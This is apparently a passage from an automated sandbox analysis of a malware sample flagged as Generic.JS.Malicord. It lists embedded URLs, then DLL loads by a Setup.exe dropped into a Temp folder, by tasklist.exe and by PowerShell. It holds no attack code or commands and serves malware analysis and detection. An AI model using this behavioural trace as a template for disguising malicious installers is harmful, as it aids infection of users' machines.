String found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).No |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://policies.google.com/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://public.dns.iij.jp/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://public.dns.iij.jp/IIJ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://public.dns.iij.jp/dns-query |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn |
Source: fr.pak.0.dr |
String found in binary or memory: https://support.google.com/chrome/a/?p=block_warn |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://support.google.com/chrome/answer/6098869 |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://support.google.com/chromebook?p=app_intent |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html |
Source: zh-CN.pak.0.dr |
String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html |
Source: fr.pak.0.dr |
String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlG |
Source: sw.pak.0.dr |
String found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlInasimamiwa |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://www.nic.cz/odvr/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://www.nic.cz/odvr/CZ.NIC |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://www.quad9.net/home/privacy/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://www.quad9.net/home/privacy/Quad9 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: dwmapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: oleacc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: shfolder.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: windows.fileexplorer.common.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: ntshrui.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ffmpeg.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uiautomationcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: umpdc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: kbdus.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: napinsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: pnrpnsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wshbth.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: nlaapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winrnr.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: windows.ui.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: windowmanagementapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: inputhost.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: twinapi.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: twinapi.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: wtsapi32.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winsta.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mscms.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: coloradapterclient.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mmdevapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: devobj.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: framedynos.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: winsta.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ffmpeg.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uiautomationcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: umpdc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dxgi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: resourcepolicyclient.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mf.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mfplat.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: rtworkq.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: msmpeg2vdec.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: mfperfhelper.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dxva2.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: msvproc.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dwmapi.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: mpr.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: framedynos.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: winsta.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\tasklist.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: ffmpeg.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: uiautomationcore.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dbghelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe |
Section loaded: secur32.dll |
